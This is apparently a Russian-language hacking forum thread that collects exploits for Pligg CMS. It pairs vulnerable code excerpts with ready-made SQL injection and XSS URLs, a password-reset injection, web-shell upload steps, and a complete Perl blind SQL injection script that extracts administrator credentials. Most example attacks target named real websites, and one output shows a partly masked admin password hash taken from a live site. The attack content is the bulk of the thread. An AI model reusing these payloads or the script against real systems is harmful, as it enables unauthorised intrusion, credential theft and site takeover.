Продукт:
Pligg Content Management System
Beta 9.8
09.08.2007
Homepage: http://www.pligg.com
Дорк:
Powered By Pligg

Blind SQL-injection
magic_quotes = off
/out.php
------------------------
...
requestID = $_REQUEST['id'];
$requestTitle = $_REQUEST['title'];
$requestURL = $_REQUEST['url'];

if(isset($requestTitle)){
$requestID = $db->get_var("SELECT link_id FROM " . table_links . " WHERE `link_title_url` = '$requestTitle';");
}

if(isset($requestURL)){
$requestID = $db->get_var("SELECT link_id FROM " . table_links . " WHERE `link_url` = '$requestURL';");
}

if(is_numeric($requestID)) {
...
------------------------
exploit:
http://pligg/out.php?title=' union select if(true,1,null) -- -
http://pligg/out.php?title=' union select if(false,1,null) -- -
example:
http://tutoriality.com/out.php?title=1' union select if(true,1,null) -- -
http://tutoriality.com/out.php?title=1' union select if(false,1,null) -- -
exploit:
http://pligg/out.php?url=' union select if(true,1,null) -- -
http://pligg/out.php?url=' union select if(false,1,null) -- -
example:
http://tutoriality.com/out.php?url=' union select if(true,1,null) -- -
http://tutoriality.com/out.php?url=' union select if(false,1,null) -- -

Blind SQL-injection
register_globals = on
/userrss.php
------------------------
...
if(isset($_REQUEST['user'])){$login = $_REQUEST['user'];}
$user=new User();
$user->username = $login;
if(!$user->read()) {
echo "error: user does not exist";
die;
}
...
if(!empty($_REQUEST['rows']))
$rows = $_REQUEST['rows'];
else $rows = 40;
...
if(!empty($_REQUEST['status'])) {
$status = $_REQUEST['status'];
} else {
// By default it searches on all
if($search) $status = 'all';
else $status = 'all';
}

switch ($status) {
case 'published':
$order_field = 'link_published_date';
$link_date = 'published_date';
$title = $main_smarty->get_config_vars("PLIGG_Visual_Published_News");
$from_where = "FROM " . table_links . " WHERE link_status='published' ";
break;
case 'queued':
... case
... case
... }
$from_where .= " AND link_author=$user->id "; //вот тут можно дописать кусок скул-запроса.

$order_by = " ORDER BY $order_field DESC ";
$last_modified = $db->get_var("SELECT UNIX_TIMESTAMP(max($order_field)) links $from_where");
$sql = "SELECT DISTINCT link_id $from_where $order_by LIMIT $rows";
------------------------
exploit
http://pligg/userrss.php?user=god&rows=5&status=1&order_field=link_date&from_where=from pligg_links where link_id=1 and true -- -
http://pligg/userrss.php?user=god&rows=5&status=1&order_field=link_date&from_where=from pligg_links where link_id=1 and false -- -
example
http://masnoticias.dosmanzanas.com/userrss.php?user=BriceLamchi&rows=5&status=1&order_field=link_date&from_where=from pligg_links where link_id=1 and true -- -
http://masnoticias.dosmanzanas.com/userrss.php?user=BriceLamchi&rows=5&status=1&order_field=link_date&from_where=from pligg_links where link_id=1 and false -- -

Blind SQL-injection
magic_quotes_gpc = off
/login.php
------------------------
...
if($_POST["processlogin"] == 3) { // if user requests forgotten password
$username = trim($_POST['username']);
if(strlen($username) == 0){
$errorMsg = $main_smarty->get_config_vars("PLIGG_Visual_Login_Forgot_Error");
}
else {
$user = $db->get_row("SELECT * FROM `" . table_users . "` where `user_login` = '".$username."'");
if($user){
$salt = substr(md5(uniqid(rand(), true)), 0, SALT_LENGTH);
...
------------------------
exploit:
POST:http://pligg/login.php?processlogin=3&username=root' or false -- -
POST:http://pligg/login.php?processlogin=3&username=root' or true -- -

if file_priv=Y
/login.php?processlogin=3&username=root' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25 into outfile '/path/pligg.txt' -- -
POST:http://www.innovationworx.com/cafe/login.php?processlogin=3&username=root' or true -- -
POST:http://www.innovationworx.com/cafe/login.php?processlogin=3&username=root' or false -- -
POST:http://www.innovationworx.com/cafe//login.php?processlogin=3&username=root' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25 into outfile '/tmp/tmp.txt' -- -

Blind SQL-injection
magic_quotes = off
/story.php
-------------------------
...
if(isset($_REQUEST['title'])){$requestTitle = strip_tags($_REQUEST['title']);}
...
if(isset($requestTitle)){
$tmp = "SELECT link_id FROM " . table_links . " WHERE `link_title_url` = '$requestTitle';";
$requestID = $db->get_var($tmp);
}
...
-------------------------
exploit:
http://pligg/story.php?title=существующий title' and (substring(version(),1,1))>1-- -
example:
http://tutoriality.com/story.php?title=sweating__sweating' and (substring(version(),1,1))>1-- -
http://namecritics.com/story.php?title=clock_jewels' and (substring(version(),1,1))%3E1-- -

Blind SQL-injection
/editlink.php
-------------------------
...
if(isset($_GET['id'])){
$theid = strip_tags($_GET['id']);
}
if(isset($_POST['id'])){
$theid = strip_tags($_POST['id']);
}
...
$link = $db->get_row("SELECT link_id, link_author FROM " . table_links . " WHERE link_id=".$theid.";");
if ($link) {
if ($link->link_author==$current_user->user_id || $current_user->user_level == "admin" || $current_user->user_level == "god")
{
...
-------------------------
exploit
http://pligg/editlink.php?id=-1 union select 1,if(true,'god',1)-- -
http://pligg/editlink.php?id=-1 union select 1,if(false,'god',1)-- -

if file_priv=Y
http://pligg/editlink.php?id=-1 union select 1,2 into outfile 'c:/pligg.txt'-- -
example:
http://www.innovationworx.com/cafe/editlink.php?id=-1 union select 1,if(true,'god',1)-- -
http://www.innovationworx.com/cafe/editlink.php?id=-1 union select 1,if(false,'god',1)-- -
(c) AFoST

AFoST, в версии 1.0.0. все Blind'и не работают)
т.е. разработчики добавили ф-цию "антихак" sanitize(, и теперь код уже выглядит уже так%
$requestID = sanitize($_REQUEST['id'], 3);
$requestTitle = sanitize($_REQUEST['title'], 3);
$requestURL = sanitize($_REQUEST['url'], 3);


Pligg 1.0.0

pXSS
/register_complete.php$user=$_GET['user'];

$usr = new User();
$usr->username = $user;
if ($usr->read()){
$email = $usr->email;
}exploit:/register_complete.php?user=a<script>alert(/xss/);</script>example:http://www.gossipsnipper.com/register_complete.php?user=a<script>alert(/xss/);</script>

Full path disclosure
/install/header.php
/install/install0.php
/install/troubleshooter.php
/install/install1.php
/install/menu.php
/libs/backup/mysql_backup/backup.php
/libs/backup/mysql_backup/init.php

Full path disclosure
/Config_File.class.php
/Smarty_Compiler.class.php
/Smarty_Test.class.php
/class.compiler.php
/podcast.php
/settings.php
Directory listing
при удачном htaccess
http://pligg/cache/
http://pligg/internal/
http://pligg/evb/
http://pligg/libs/
http://pligg/modules/
http://pligg/plugins/
http://pligg/templates/
http://pligg/templates_c/

AFoST, в версии 1.0.0. все Blind'и не работают)
т.е. разработчики добавили ф-цию "антихак" sanitize(, и теперь код уже выглядит уже так%
$requestID = sanitize($_REQUEST['id'], 3);
$requestTitle = sanitize($_REQUEST['title'], 3);
$requestURL = sanitize($_REQUEST['url'], 3);

Она и в той версии был) но не везде =)
В этом двиге тот самый интересный Сцукокод (https://forum.antichat.ru/thread127276.html) на смену админского пароля)) Докрутить б...

User password reset to "password"

Спасибо Gifts (https://forum.antichat.ru/member.php?userid=54968) за помощь (https://forum.antichat.ru/showpost.php?p=1361544&postcount=8)

if($_GET["processlogin"] == 4) { // if user clicks on the forgotten password confirmation code
$username = trim($_GET['username']);
if(strlen($username) == 0){
$errorMsg = $main_smarty->get_config_vars("PLIGG_Visual_Login_Forgot_Error");
}
else {
$confirmationcode = $_GET["confirmationcode"];
$DBconf = $db->get_var("SELECT `last_reset_code` FROM `" . table_users . "` where `user_login` = '".$username."'");
if($DBconf){
if($DBconf == $confirmationcode && !empty($confirmationcode)){
$db->query('UPDATE `' . table_users . '` SET `last_reset_code` = "" WHERE `user_login` = "'.$username.'"');
$db->query('UPDATE `' . table_users . '` SET `user_pass` = "033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750" WHERE `user_login` = "'.$username.'"');
$errorMsg = $main_smarty->get_config_vars('PLIGG_Visual_Login_Forgot_PassRes et');

exploit:
/login.php?processlogin=4&username=" or user_login = "god" /*' and 1=0 UNION select 123/*&confirmationcode=123

Version: 1.0.1 (возможно более ранние версии)
Default table prefix: pligg_

SQL Injection

Vuln file: /libs/search.php
кода довольно много, приводить не буду

Exploit:
http://[host]/[path]/search.php?search=paxek&slink=1&scategory=1)+union+select+(select+concat(0x3c62723 e,user_login,0x3a,user_pass,0x3c62723e)+from+[prefix]users+where+user_id=1),null,null--+&adv=1Example:
http://www.autoglassindustry.com/search.php?search=paxek&slink=1&scategory=1)+union+select+(select+concat(0x3c62723 e,user_login,0x3a,user_pass,0x3c62723e)+from+pligg _users+where+user_id=1),null,null--+&adv=1
------------------------------------------------------------------
Warning: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
admin:9c4083ae2*********************************** *****
)' at line 1 in /home/glasind/public_html/libs/db.php on line 242

Version: 1.0.3 (последняя на данный момент)

Blind SQL Injection

Vuln file: /libs/search.php
Exploit:http://[host]/[path]/search.php?search=[search_keywords]&slink=1&scategory=1[inj]&adv=1Вывода как в версии 1.0.1 не получилось добиться, т.к по дефолту в конфиге "error_reporting(E_ERROR)", поэтому крутим как blind.
Написал эксплойт под это дело.
#!/usr/bin/perl

use LWP;
use Fcntl;

$title = "

=====================================
! !
! Pligg CMS Blind SQL Injection Exploit !
! !
! Found && coded by RulleR !
! Antichat.ru !
! !

=====================================
";
print $title;
print "\n[+] Enter Host: ";
chop ($host = <>);
print "\n[+] Enter Search Keywords: ";
chop ($searchkey = <>);
print "\n[+] Enter \"scategory\": ";
chop ($scat = <>);
print "\n[>] Exploiting started... $host\n\n";
print " Please wait...\n\n";

#________________ CONFIG _______________

$regexp = '<a href=.*>'.$searchkey;
$length = 100;
$column = 'user_login';#concat_ws(0x3a,user_login,user_pass)
$prefix = 'pligg_';
$table = 'users';
$user_id = 1;
$filename = 'Pligg_exp_result.txt';
#_______________________________________

XEK: for ($start = 1; $start <= $length; $start++) {
$min = 0;$max = 255;
while(1) {
$x = int(($max - $min)/2 + $min);
if (&WebGet($host,$start,$x) =~ /$regexp/) {
$min = $x;
}
else {
$max = $x;
}
last XEK if ($max == 1);
if ($max - $min == 1) {
$char = chr($max);
push (@res, $char);
print @res,"\n";last;
}

}
}

print "\n[!] Exploiting finished :)\n\n";
print "---------------------- [Result] ----------------------\n";
print @res,"\n";
print "------------------------------------------------------\n";

sysopen (RESULT, $filename, O_WRONLY | O_CREAT);
print RESULT $title;
print RESULT "\n---------------------- [Result] ----------------------\n";
print RESULT @res;
print RESULT "\n------------------------------------------------------\n";
close (RESULT);
print "\nResult saving in $filename\n";

sub WebGet() {
$inj = '/search.php?search='.$searchkey.'&slink=1&scategory='.$scat.'+and+ord(substr((select+'.$colu mn.'+from+'.$prefix.$table.'+where+user_id='.$user _id.'),'.$_[1].',1))>'.$_[2].'&adv=1';
$request = HTTP::Request->new(GET => $_[0].$inj);
$u_a = LWP::UserAgent->new();
$u_a->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$u_a->timeout(10);
$response = $u_a->request($request);
if ($response->is_error) {
print " ! Error: ".$response->status_line.".\n"; die " :(\n";
}
return $response->content;
}
или берем с pastebin.com (http://pastebin.com/f11b2603a)
Пример работы (получение login'а админа):D:\\$_W3b-x3q\cms_all>pligg_exp.pl

=====================================
! !
! Pligg CMS Blind SQL Injection Exploit !
! !
! Found && coded by RulleR !
! !

=====================================

[+] Enter Host: http://doanhnhanso.com/news

[+] Enter Search Keywords: Online

[+] Enter "scategory": 6

[>] Exploiting started... http://doanhnhanso.com/news

Please wait...

d
do
doa
doan
doanh
doanhn
doanhnh
doanhnha
doanhnhan
doanhnhans
doanhnhanso

[!] Exploiting finished :)

---------------------- [Result] ----------------------
doanhnhanso
------------------------------------------------------

Result saving in Pligg_exp_result.txt

Passive XSS
Exploit:http://[host]/[path]/search.php?search=</title><script>alert(1)</script>

http://[host]/[path]/search.php?"><script>alert(1)</script>
------------------------------------------------------------
Need: register_globals = ON
http://[host]/[path]/advancedsearch.php?category_option=<script>alert(1)</script>
Upload shell
Need:admin account

Admin --> Modules
Устанавливаем модуль Upload (по дефолту не установлен), включаем модуль (кликаем Disable).
Далее переходим в Settings --> General Settings
в Allowed File Type дописываем расширение php.
Добавляем новость и прикрепляем шелл. Шелл будет в /modules/upload/attachments/[name_shell].php

RulleR, даже если вывода через ошибку нет, всё равно в сплоитах стоит использовать бинарный поиск, как минимум.